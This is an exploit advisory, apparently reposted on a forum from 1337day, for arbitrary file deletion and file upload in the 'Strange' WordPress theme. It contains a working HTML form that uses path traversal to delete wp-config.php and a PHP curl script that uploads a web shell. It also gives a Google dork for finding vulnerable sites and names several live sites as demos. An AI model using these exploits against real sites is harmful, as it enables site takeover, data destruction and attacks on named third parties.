Kod:
Exploit Title : Wordpress Theme Strange File Upload / File Deletion
Exploit Author : NULL_Pointer
Contact : https://www.facebook.com/xenith.gianni
Date : 21/09/2014
Github Mirror : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/ut-strange
Version : 3.1
Google Dork : inurl:/wp-content/themes/ut-strange/
Tested on : Linux, Windows 7
--------------------------------------------------------------
Wordpress Theme Strange have suffers from a File Upload and File Deletion Vulnerability.
1. File Deletion :
This issue allows an attacker to influence calls to the 'unlink()' function and delete arbitrary files. Due to a lack of input validation, an attacker can supply directory traversal sequences followed by an arbitrary file name to delete specific files.
Exploit Code (HTML) :
<form action="http://127.0.0.1/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php" method="POST">
<input type="hidden" name="action" value="deletefile">
<input type="text" name="file" value="../../../wp-config.php">
<input type="submit" value="Delete It">
</form>
2. File Upload :
Exploit Code (PHP) :
<?php
if (!isset ($argv[1], $argv[2]))
die ("Usage : php {$argv[0]} http://127.0.0.1/ my_shell.php");
if (!file_exists ($argv[2]))
die ("Fatal Error : File \"{$argv[2]}\" Not Found...\n");
$post = array
(
"file_upload" => "@".$argv[2],
"themeroot" => "."
//,"dir"=>"."
);
$ch = curl_init ($argv[1]."/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Shell Path : http://127.0.0.1/wp-content/themes/ut-strange/addpress/includes/[SHELL_NAME]
Demo Sites :
http://www.estudio34.com
http://www.argela.com
http://www.gcntv.net
Proof Video : http://www.youtube.com/watch?v=eVHITnvYjqs
# 878D57036E0D132D 1337day.com [2014-09-21] BAED663EAD0970D8 #
Mənbə:
http://www.1337day.com/exploit/22674